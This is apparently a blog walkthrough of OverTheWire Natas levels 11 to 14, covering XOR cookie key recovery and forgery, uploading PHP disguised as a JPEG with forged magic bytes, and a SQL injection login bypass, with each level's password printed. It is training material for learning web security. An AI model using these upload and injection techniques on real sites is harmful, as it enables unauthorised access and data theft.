Natas Level 11
This level opens up with a simple background color changing application.
We have access to the source code again, so upon reading it we see that default data is loaded using a loadData function.
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
$data = loadData($defaultdata);
The load data function accesses the cookie, loads it into the mydata variable and checks if the cookie has the key "data".
If it does, it stores a base64 decoded, custom xor encrypted, json decoded version of the cookie data in the variable temp data. Then it checks if the tempdata variable is an array with key "showpassword" and "bgcolor". If it does, it checks if the bgcolor matches the format of a hexcode (#123456) and if it does, then it moves the information in the tempdata to the mydata variable and returns it.
For us to return an altered version of the mydata variable, a couple things must be true:
- The cookie has the "data" key in it
- The 3 function encrypt/decode of the cookie "data" must be an array
- The array must have a key showpassword and bgcolor
- The bgcolor value must match the format of a hexcode
It appears that what we need to do is change the cookie in such a way that once it comes out of the three function enrypt/decode, it results in an array that has a key “showpassword” set to true, and a bgcolor key that is set to some hexcode.
Luckily for us, json_decode and base64_decode have their respective encode functions built into php so we just need to use the associated function. So let’s take a deeper look into how we can decrypt the xor function.
xor functions are associative and transitive, this means that if:
A xor B = C, then
A xor C = B, and
C xor A = B, and so on.
In this case, we have a key, text and an output text. We can apply similar principles here to find the key that the xor function is using so we can manipulate the output text in our favor.
IN xor KEY = OUTPUT, then
IN xor OUTPUT = KEY
Since we know that the input will be the base64 decoded cookie, and our output will be the json encoded array. To get the cookie from our site, we go to the dev tools and enter document.cookie into the console and copy the data we get.
Cookie = MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY
After running this function, it returns:
KNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLK
With xor functions, if one value is shorter than the other it begins to repeat the key and - so we can determine that our key is ‘KNHL’. Now using this information, we want to have an array with key showpassword set to yes and a valid bgcolor hexcode. Applying the principle we learnt about earlier, we can assume:
ARRAY xor KEY = COOKIE
As explained earlier, we reverse what happens to the cookie data to get a valid cookie holding our required information. Now we just need to set our cookie to the cookie that comes out of this function:
MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz
We can do this by going to the dev tools again and typing
document.cookie=”data=thecookieyougot”
Upon refreshing the page with our new cookie:
Pass for next level: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
Natas Level 12
We are presented with a simple page to choose and upload a file. Reading the source code, we can see that it lets us upload jpeg files to the site and then does a couple things to it.
The important thing to note is that once it's there, it generates a link to the image and displays it on the site. This probably means that if we get php code and pretend it's a jpeg file, we will be able to run it when the link displays.
First, we’ll create a fake jpg that will echo the password for the next level as we have done in previous levels by peeking into the webpass folder.
This creates a jpg which contains php code that reads out the password file.
Uploading this to the website results in a clickable link that doesn’t do much.
To make this link do something, we can probably change the extension of our file to .php so that the browser runs our code! We can do this by editing the file extension in the dev tools then uploading it which gives us a link that prints out the password stored for the next level
Pass for next level: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9
Natas Level 13
Now the site checks if the file uploaded is actually an image using the exif_imagetype function. Reading the documentation, this function reads the first bytes of an image and checks its signature. A value of 2 signifies a jpeg type, so we just need to prepend some bytes of information into our file to bypass the function. I did this using hexedit, but any tool to modify the bytes of a file will work here.
After a quick search I found that I needed to edit the first 4 bytes to
FF D8 FF DB as this is the bytes used for raw jpeg files.
I added 4 characters to my image file so I can change them using hexedit.
I uploaded the image, changed its extension and received the password for the next level!
Pass for next level: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
Natas Level 14
We open up to a login screen. In the source code it’s made apparent that there is a mysql database.
The query that is called looks like this:
SELECT * from users where username=”input” and password=”input”;
The code then checks if any rows have been returned from the database. We can do a simple sql injection which will ensure that a row will always return like so:
SELECT * from users where username=”” or “”=”” and password=”” or””=””;
This works because the query or “”=”” is always true. As the regular query already includes double quotations for us, we need to add " or ""=" to get the query we want.
Upon clicking login, we are through to the next level.
Pass for next level: TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB
What I learnt
It was really fun getting to do some of the sql injections, as I've always heard about it - but never had the chance to do them. I learnt about how some verification methods work, like the exif_image checking bytes of a file. I also learnt that since code can be run on websites, many languages run on the web like: javascript, php and java can be exploited.
Top comments (0)